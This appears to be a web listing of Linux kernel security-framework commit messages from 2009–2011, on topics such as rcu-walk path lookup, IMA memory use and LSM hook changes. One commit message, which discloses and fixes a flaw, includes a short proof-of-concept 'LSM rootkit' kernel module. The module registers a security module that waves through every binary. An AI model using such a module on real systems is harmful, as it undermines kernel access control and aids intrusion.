08 Jan, 2011

1 commit

  • …t/npiggin/linux-npiggin

    * 'vfs-scale-working' of git://git.kernel.org/pub/scm/linux/kernel/git/npiggin/linux-npiggin: (57 commits)
    fs: scale mntget/mntput
    fs: rename vfsmount counter helpers
    fs: implement faster dentry memcmp
    fs: prefetch inode data in dcache lookup
    fs: improve scalability of pseudo filesystems
    fs: dcache per-inode inode alias locking
    fs: dcache per-bucket dcache hash locking
    bit_spinlock: add required includes
    kernel: add bl_list
    xfs: provide simple rcu-walk ACL implementation
    btrfs: provide simple rcu-walk ACL implementation
    ext2,3,4: provide simple rcu-walk ACL implementation
    fs: provide simple rcu-walk generic_check_acl implementation
    fs: provide rcu-walk aware permission i_ops
    fs: rcu-walk aware d_revalidate method
    fs: cache optimise dentry and inode for rcu-walk
    fs: dcache reduce branches in lookup path
    fs: dcache remove d_mounted
    fs: fs_struct use seqlock
    fs: rcu-walk for path lookup
    ...

    Linus Torvalds
     

07 Jan, 2011

1 commit

  • Perform common cases of path lookups without any stores or locking in the
    ancestor dentry elements. This is called rcu-walk, as opposed to the current
    algorithm which is a refcount based walk, or ref-walk.

    This results in far fewer atomic operations on every path element,
    significantly improving path lookup performance. It also avoids cacheline
    bouncing on common dentries, significantly improving scalability.

    The overall design is like this:
    * LOOKUP_RCU is set in nd->flags, which distinguishes rcu-walk from ref-walk.
    * Take the RCU lock for the entire path walk, starting with the acquiring
    of the starting path (eg. root/cwd/fd-path). So now dentry refcounts are
    not required for dentry persistence.
    * synchronize_rcu is called when unregistering a filesystem, so we can
    access d_ops and i_ops during rcu-walk.
    * Similarly take the vfsmount lock for the entire path walk. So now mnt
    refcounts are not required for persistence. Also we are free to perform mount
    lookups, and to assume dentry mount points and mount roots are stable up and
    down the path.
    * Have a per-dentry seqlock to protect the dentry name, parent, and inode,
    so we can load this tuple atomically, and also check whether any of its
    members have changed.
    * Dentry lookups (based on parent, candidate string tuple) recheck the parent
    sequence after the child is found in case anything changed in the parent
    during the path walk.
    * inode is also RCU protected so we can load d_inode and use the inode for
    limited things.
    * i_mode, i_uid, i_gid can be tested for exec permissions during path walk.
    * i_op can be loaded.

    When we reach the destination dentry, we lock it, recheck lookup sequence,
    and increment its refcount and mountpoint refcount. RCU and vfsmount locks
    are dropped. This is termed "dropping rcu-walk". If the dentry refcount does
    not match, we can not drop rcu-walk gracefully at the current point in the
    lokup, so instead return -ECHILD (for want of a better errno). This signals the
    path walking code to re-do the entire lookup with a ref-walk.

    Aside from the final dentry, there are other situations that may be encounted
    where we cannot continue rcu-walk. In that case, we drop rcu-walk (ie. take
    a reference on the last good dentry) and continue with a ref-walk. Again, if
    we can drop rcu-walk gracefully, we return -ECHILD and do the whole lookup
    using ref-walk. But it is very important that we can continue with ref-walk
    for most cases, particularly to avoid the overhead of double lookups, and to
    gain the scalability advantages on common path elements (like cwd and root).

    The cases where rcu-walk cannot continue are:
    * NULL dentry (ie. any uncached path element)
    * parent with d_inode->i_op->permission or ACLs
    * dentries with d_revalidate
    * Following links

    In future patches, permission checks and d_revalidate become rcu-walk aware. It
    may be possible eventually to make following links rcu-walk aware.

    Uncached path elements will always require dropping to ref-walk mode, at the
    very least because i_mutex needs to be grabbed, and objects allocated.

    Signed-off-by: Nick Piggin

    Nick Piggin
     

06 Jan, 2011

1 commit

  • unix_release() can asynchornously set socket->sk to NULL, and
    it does so without holding the unix_state_lock() on "other"
    during stream connects.

    However, the reverse mapping, sk->sk_socket, is only transitioned
    to NULL under the unix_state_lock().

    Therefore make the security hooks follow the reverse mapping instead
    of the forward mapping.

    Reported-by: Jeremy Fitzhardinge
    Reported-by: Linus Torvalds
    Signed-off-by: David S. Miller

    David S. Miller
     

16 Nov, 2010

1 commit

  • The addition of CONFIG_SECURITY_DMESG_RESTRICT resulted in a build
    failure when CONFIG_PRINTK=n. This is because the capabilities code
    which used the new option was built even though the variable in question
    didn't exist.

    The patch here fixes this by moving the capabilities checks out of the
    LSM and into the caller. All (known) LSMs should have been calling the
    capabilities hook already so it actually makes the code organization
    better to eliminate the hook altogether.

    Signed-off-by: Eric Paris
    Acked-by: James Morris
    Signed-off-by: Linus Torvalds

    Eric Paris
     

27 Oct, 2010

2 commits

  • * ima-memory-use-fixes:
    IMA: fix the ToMToU logic
    IMA: explicit IMA i_flag to remove global lock on inode_delete
    IMA: drop refcnt from ima_iint_cache since it isn't needed
    IMA: only allocate iint when needed
    IMA: move read counter into struct inode
    IMA: use i_writecount rather than a private counter
    IMA: use inode->i_lock to protect read and write counters
    IMA: convert internal flags from long to char
    IMA: use unsigned int instead of long for counters
    IMA: drop the inode opencount since it isn't needed for operation
    IMA: use rbtree instead of radix tree for inode information cache

    Linus Torvalds
     
  • IMA always allocates an integrity structure to hold information about
    every inode, but only needed this structure to track the number of
    readers and writers currently accessing a given inode. Since that
    information was moved into struct inode instead of the integrity struct
    this patch stops allocating the integrity stucture until it is needed.
    Thus greatly reducing memory usage.

    Signed-off-by: Eric Paris
    Acked-by: Mimi Zohar
    Signed-off-by: Linus Torvalds

    Eric Paris
     

21 Oct, 2010

3 commits

  • Right now secmark has lots of direct selinux calls. Use all LSM calls and
    remove all SELinux specific knowledge. The only SELinux specific knowledge
    we leave is the mode. The only point is to make sure that other LSMs at
    least test this generic code before they assume it works. (They may also
    have to make changes if they do not represent labels as strings)

    Signed-off-by: Eric Paris
    Acked-by: Paul Moore
    Acked-by: Patrick McHardy
    Signed-off-by: James Morris

    Eric Paris
     
  • All security modules shouldn't change sched_param parameter of
    security_task_setscheduler(). This is not only meaningless, but also
    make a harmful result if caller pass a static variable.

    This patch remove policy and sched_param parameter from
    security_task_setscheduler() becuase none of security module is
    using it.

    Cc: James Morris
    Signed-off-by: KOSAKI Motohiro
    Signed-off-by: James Morris

    KOSAKI Motohiro
     
  • We can set default LSM module to DAC (which means "enable no LSM module").
    If default LSM module was set to DAC, security_module_enable() must return 0
    unless overridden via boot time parameter.

    Signed-off-by: Tetsuo Handa
    Acked-by: Serge E. Hallyn
    Signed-off-by: James Morris

    Tetsuo Handa
     

11 Aug, 2010

2 commits

  • * 'writable_limits' of git://decibel.fi.muni.cz/~xslaby/linux:
    unistd: add __NR_prlimit64 syscall numbers
    rlimits: implement prlimit64 syscall
    rlimits: switch more rlimit syscalls to do_prlimit
    rlimits: redo do_setrlimit to more generic do_prlimit
    rlimits: add rlimit64 structure
    rlimits: do security check under task_lock
    rlimits: allow setrlimit to non-current tasks
    rlimits: split sys_setrlimit
    rlimits: selinux, do rlimits changes under task_lock
    rlimits: make sure ->rlim_max never grows in sys_setrlimit
    rlimits: add task_struct to update_rlimit_cpu
    rlimits: security, add task_struct to setrlimit

    Fix up various system call number conflicts. We not only added fanotify
    system calls in the meantime, but asm-generic/unistd.h added a wait4
    along with a range of reserved per-architecture system calls.

    Linus Torvalds
     
  • * 'for-linus' of git://git.infradead.org/users/eparis/notify: (132 commits)
    fanotify: use both marks when possible
    fsnotify: pass both the vfsmount mark and inode mark
    fsnotify: walk the inode and vfsmount lists simultaneously
    fsnotify: rework ignored mark flushing
    fsnotify: remove global fsnotify groups lists
    fsnotify: remove group->mask
    fsnotify: remove the global masks
    fsnotify: cleanup should_send_event
    fanotify: use the mark in handler functions
    audit: use the mark in handler functions
    dnotify: use the mark in handler functions
    inotify: use the mark in handler functions
    fsnotify: send fsnotify_mark to groups in event handling functions
    fsnotify: Exchange list heads instead of moving elements
    fsnotify: srcu to protect read side of inode and vfsmount locks
    fsnotify: use an explicit flag to indicate fsnotify_destroy_mark has been called
    fsnotify: use _rcu functions for mark list traversal
    fsnotify: place marks on object in order of group memory address
    vfs/fsnotify: fsnotify_close can delay the final work in fput
    fsnotify: store struct file not struct path
    ...

    Fix up trivial delete/modify conflict in fs/notify/inotify/inotify.c.

    Linus Torvalds
     

02 Aug, 2010

1 commit

  • When commit be6d3e56a6b9b3a4ee44a0685e39e595073c6f0d "introduce new LSM hooks
    where vfsmount is available." was proposed, regarding security_path_truncate(),
    only "struct file *" argument (which AppArmor wanted to use) was removed.
    But length and time_attrs arguments are not used by TOMOYO nor AppArmor.
    Thus, let's remove these arguments.

    Signed-off-by: Tetsuo Handa
    Acked-by: Nick Piggin
    Signed-off-by: James Morris

    Tetsuo Handa
     

28 Jul, 2010

1 commit

  • introduce a new fsnotify hook, fsnotify_perm(), which is called from the
    security code. This hook is used to allow fsnotify groups to make access
    control decisions about events on the system. We also must change the
    generic fsnotify function to return an error code if we intend these hooks
    to be in any way useful.

    Signed-off-by: Eric Paris

    Eric Paris
     

16 Jul, 2010

1 commit


17 May, 2010

1 commit


12 Apr, 2010

13 commits


09 Mar, 2010

1 commit


03 Mar, 2010

1 commit

  • LSM framework doesn't allow to load a security module on runtime, it must be loaded on boot time.
    but in security/security.c:
    int register_security(struct security_operations *ops)
    {
    ...
    if (security_ops != &default_security_ops)
    return -EAGAIN;
    ...
    }
    if security_ops == &default_security_ops, it can access to register a security module. If selinux is enabled,
    other security modules can't register, but if selinux is disabled on boot time, the security_ops was set to
    default_security_ops, LSM allows other kernel modules to use register_security() to register a not trust
    security module. For example:

    disable selinux on boot time(selinux=0).

    #include
    #include
    #include
    #include
    #include
    #include
    #include

    MODULE_LICENSE("GPL");
    MODULE_AUTHOR("wzt");

    extern int register_security(struct security_operations *ops);
    int (*new_register_security)(struct security_operations *ops);

    int rootkit_bprm_check_security(struct linux_binprm *bprm)
    {
    return 0;
    }

    struct security_operations rootkit_ops = {
    .bprm_check_security = rootkit_bprm_check_security,
    };

    static int rootkit_init(void)
    {
    printk("Load LSM rootkit module.\n");

    /* cat /proc/kallsyms | grep register_security */
    new_register_security = 0xc0756689;
    if (new_register_security(&rootkit_ops)) {
    printk("Can't register rootkit module.\n");
    return 0;
    }
    printk("Register rootkit module ok.\n");

    return 0;
    }

    static void rootkit_exit(void)
    {
    printk("Unload LSM rootkit module.\n");
    }

    module_init(rootkit_init);
    module_exit(rootkit_exit);

    Signed-off-by: Zhitong Wang
    Signed-off-by: James Morris

    wzt.wzt@gmail.com
     

01 Mar, 2010

1 commit


24 Feb, 2010

1 commit

  • Enhance the security framework to support resetting the active security
    module. This eliminates the need for direct use of the security_ops and
    default_security_ops variables outside of security.c, so make security_ops
    and default_security_ops static. Also remove the secondary_ops variable as
    a cleanup since there is no use for that. secondary_ops was originally used by
    SELinux to call the "secondary" security module (capability or dummy),
    but that was replaced by direct calls to capability and the only
    remaining use is to save and restore the original security ops pointer
    value if SELinux is disabled by early userspace based on /etc/selinux/config.
    Further, if we support this directly in the security framework, then we can
    just use &default_security_ops for this purpose since that is now available.

    Signed-off-by: Zhitong Wang
    Acked-by: Stephen Smalley
    Signed-off-by: James Morris

    wzt.wzt@gmail.com
     

07 Feb, 2010

1 commit


04 Feb, 2010

1 commit

  • This allows the LSM to distinguish between syslog functions originating
    from /proc/kmsg access and direct syscalls. By default, the commoncaps
    will now no longer require CAP_SYS_ADMIN to read an opened /proc/kmsg
    file descriptor. For example the kernel syslog reader can now drop
    privileges after opening /proc/kmsg, instead of staying privileged with
    CAP_SYS_ADMIN. MAC systems that implement security_syslog have unchanged
    behavior.

    Signed-off-by: Kees Cook
    Acked-by: Serge Hallyn
    Acked-by: John Johansen
    Signed-off-by: James Morris

    Kees Cook
     

15 Jan, 2010

1 commit

  • Currently, the getsecurity and setsecurity operations return zero for
    kernel private inodes, where xattrs are not available directly to
    userspace.

    This confuses some applications, and does not conform to the
    man page for getxattr(2) etc., which state that these syscalls
    should return ENOTSUP if xattrs are not supported or disabled.

    Note that in the listsecurity case, we still need to return zero
    as we don't know which other xattr handlers may be active.

    For discussion of userland confusion, see:
    http://www.mail-archive.com/bug-coreutils@gnu.org/msg17988.html

    This patch corrects the error returns so that ENOTSUP is reported
    to userspace as required.

    Signed-off-by: James Morris
    Acked-by: Stephen Smalley
    Acked-by: Serge Hallyn

    James Morris
     

08 Dec, 2009

1 commit


10 Nov, 2009

1 commit

  • For SELinux to do better filtering in userspace we send the name of the
    module along with the AVC denial when a program is denied module_request.

    Example output:

    type=SYSCALL msg=audit(11/03/2009 10:59:43.510:9) : arch=x86_64 syscall=write success=yes exit=2 a0=3 a1=7fc28c0d56c0 a2=2 a3=7fffca0d7440 items=0 ppid=1727 pid=1729 auid=unset uid=root gid=root euid=root suid=root fsuid=root egid=root sgid=root fsgid=root tty=(none) ses=unset comm=rpc.nfsd exe=/usr/sbin/rpc.nfsd subj=system_u:system_r:nfsd_t:s0 key=(null)
    type=AVC msg=audit(11/03/2009 10:59:43.510:9) : avc: denied { module_request } for pid=1729 comm=rpc.nfsd kmod="net-pf-10" scontext=system_u:system_r:nfsd_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=system

    Signed-off-by: Eric Paris
    Signed-off-by: James Morris

    Eric Paris
     

09 Nov, 2009

1 commit

  • The LSM currently requires setting a kernel parameter at boot to select
    a specific LSM. This adds a config option that allows specifying a default
    LSM that is used unless overridden with the security= kernel parameter.
    If the the config option is not set the current behavior of first LSM
    to register is used.

    Signed-off-by: John Johansen
    Acked-by: Serge Hallyn
    Signed-off-by: James Morris

    John Johansen
     

25 Oct, 2009

1 commit


12 Oct, 2009

1 commit